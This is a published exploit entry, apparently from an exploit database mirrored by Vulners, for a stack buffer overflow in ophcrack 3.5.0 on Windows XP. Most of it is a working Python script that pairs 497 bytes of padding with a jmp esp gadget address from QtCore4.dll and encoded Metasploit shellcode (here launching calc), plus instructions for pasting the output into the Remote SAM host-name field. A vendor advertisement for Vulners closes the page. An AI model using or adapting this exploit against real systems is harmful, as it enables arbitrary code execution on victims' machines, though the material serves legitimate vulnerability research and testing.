# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF
# Date: 21.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://ophcrack.sourceforge.net/
# Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-win32-installer-3.5.0.exe
# Version: 3.5.0
# Tested on: Windows XP SP3 Eng (32bits)
#!/usr/bin/python
#Stack based buffer overflow - direct EIP overwrite in this case (EIP is reached 497 bytes into the field; SEH based exploitation is possible as well)
#In order to exploit go to: Load -> Remote SAM -> paste the content of the exploit.txt file generated by this script into the "Host name:" field -> choose "Don't send" once you see the crash.
#pwdump6_setup.exe will be run by ophcrack. It will crash and execute the payload.
#pwdump6_setup itself does not appear to be exploitable outside of ophcrack.
#Kudos to Hostess for pointing me to http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html
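import struct

# windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c
#
# Bytes literal so the payload is byte-exact on both Python 2 and 3.
# The leading \x54\x59 (push esp / pop ecx) is the bufferregister=esp
# prologue: the decoder assumes ESP points at the first shellcode byte,
# which is exactly the state left behind by the `jmp esp` gadget below.
shellcode = (
    b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
    b"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
    b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x79\x78\x6c\x49\x57\x70"
    b"\x65\x50\x65\x50\x75\x30\x6e\x69\x7a\x45\x44\x71\x7a\x72\x75"
    b"\x34\x4e\x6b\x46\x32\x30\x30\x4e\x6b\x56\x32\x34\x4c\x4e\x6b"
    b"\x36\x32\x54\x54\x4e\x6b\x73\x42\x71\x38\x36\x6f\x48\x37\x32"
    b"\x6a\x36\x46\x75\x61\x69\x6f\x34\x71\x49\x50\x6e\x4c\x55\x6c"
    b"\x30\x61\x61\x6c\x45\x52\x44\x6c\x57\x50\x6f\x31\x78\x4f\x56"
    b"\x6d\x47\x71\x69\x57\x7a\x42\x6a\x50\x31\x42\x46\x37\x4e\x6b"
    b"\x71\x42\x66\x70\x6e\x6b\x43\x72\x35\x6c\x66\x61\x58\x50\x6e"
    b"\x6b\x37\x30\x54\x38\x6e\x65\x6f\x30\x31\x64\x53\x7a\x56\x61"
    b"\x4e\x30\x66\x30\x6e\x6b\x50\x48\x65\x48\x4e\x6b\x30\x58\x65"
    b"\x70\x46\x61\x7a\x73\x6a\x43\x35\x6c\x43\x79\x6e\x6b\x46\x54"
    b"\x6e\x6b\x75\x51\x7a\x76\x75\x61\x49\x6f\x66\x51\x6b\x70\x4c"
    b"\x6c\x49\x51\x68\x4f\x66\x6d\x77\x71\x48\x47\x44\x78\x6b\x50"
    b"\x62\x55\x7a\x54\x34\x43\x61\x6d\x4a\x58\x67\x4b\x53\x4d\x66"
    b"\x44\x71\x65\x49\x72\x72\x78\x6e\x6b\x73\x68\x44\x64\x53\x31"
    b"\x5a\x73\x43\x56\x6e\x6b\x54\x4c\x30\x4b\x4e\x6b\x73\x68\x35"
    b"\x4c\x56\x61\x4b\x63\x4c\x4b\x66\x64\x6c\x4b\x46\x61\x58\x50"
    b"\x4f\x79\x32\x64\x56\x44\x54\x64\x73\x6b\x63\x6b\x65\x31\x31"
    b"\x49\x72\x7a\x62\x71\x49\x6f\x69\x70\x62\x78\x31\x4f\x30\x5a"
    b"\x6c\x4b\x44\x52\x5a\x4b\x4b\x36\x51\x4d\x53\x5a\x67\x71\x6c"
    b"\x4d\x4b\x35\x78\x39\x75\x50\x35\x50\x45\x50\x42\x70\x30\x68"
    b"\x35\x61\x6e\x6b\x42\x4f\x4d\x57\x79\x6f\x69\x45\x4d\x6b\x6b"
    b"\x4e\x66\x6e\x54\x72\x59\x7a\x43\x58\x59\x36\x4d\x45\x6d\x6d"
    b"\x4f\x6d\x39\x6f\x5a\x75\x75\x6c\x34\x46\x73\x4c\x57\x7a\x6d"
    b"\x50\x4b\x4b\x49\x70\x61\x65\x44\x45\x4f\x4b\x61\x57\x74\x53"
    b"\x32\x52\x52\x4f\x31\x7a\x43\x30\x36\x33\x39\x6f\x49\x45\x50"
    b"\x63\x65\x31\x32\x4c\x63\x53\x43\x30\x41\x41"
)

# !mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll]
# The address is only valid for the QtCore4.dll bundled with the tested build
# (3.5.0 on Windows XP SP3); re-run the mona search if the DLL differs.
JMP_ESP = 0x6e2a2936
# Little-endian pack gives the same 4 bytes the original spelled out by hand
# ("\x36\x29\x2a\x6e") without the manual byte-reversal step.
jmp = struct.pack("<I", JMP_ESP)

# Number of filler bytes before the saved return address is overwritten.
OFFSET = 497

buffer = b"A" * OFFSET + jmp + shellcode

# The buffer is pasted into a GUI text field, so every byte has to survive as
# printable ASCII (no NUL, no control characters); that is why the gadget was
# searched with -cp ascii and the payload encoded with alpha_mixed. Fail loudly
# rather than emit a file that will be silently mangled on paste.
bad = [b for b in bytearray(buffer) if b < 0x20 or b > 0x7e]
if bad:
    raise ValueError("payload contains non-printable bytes: %r" % bad)

# Echo the payload for convenience (it is pure ASCII, see the check above).
print(buffer.decode("ascii"))

# Binary mode: no newline translation or platform encoding step can alter the
# bytes that end up on disk.
with open("exploit.txt", "wb") as fh:
    fh.write(buffer)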
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation